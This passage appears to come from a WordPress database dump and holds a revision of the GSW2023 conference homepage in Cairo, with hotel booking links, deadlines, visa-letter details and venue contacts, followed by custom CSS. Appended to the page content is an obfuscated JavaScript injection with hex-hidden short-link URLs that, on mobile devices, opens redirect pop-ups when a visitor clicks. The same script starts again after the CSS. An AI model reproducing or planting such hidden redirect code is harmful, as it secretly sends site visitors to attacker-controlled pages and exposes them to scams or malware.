#ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\r\n<img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\r\n<img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-25 15:45:16','2023-06-25 15:45:16','',3066,'https://gsw2023.com/?p=4818',0,'revision','',0),
(4823,4,'2023-06-25 16:04:58','2023-06-25 16:04:58','.menu-text:hover{\n	cursor: pointer !important;\n}\n.zero-pad{\n	padding: 0 !important;\n}\n.zero-pad-deep, .zero-pad-deep *{\n	padding: 0 !important;\n}\n\n.zero-mar{\n	margin: 0 !important;\n}\n.zero-mar-deep, .zero-mar-deep *{\n	margin: 0 !important;\n}\n.full-width{\n	width:100% !important;\n}\n.center{\n	text-align: center !important;\n}\n.img_card_1{\n	width: 110px;\n	height: 150px;\n	object-fit: cover;\n	border-radius: 10px;\n}\n.img_card_2 img{\n	width: 150px;\n	height: 200px;\n	object-fit: cover;\n	border-radius: 10px;\n}\n\n\n.gsw_card, .gsw_card *{\n	margin: 0 !important;\n}\n.gsw_card a{\n	color: #4169e1 !important;\n	text-decoration: none !important;\n}\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 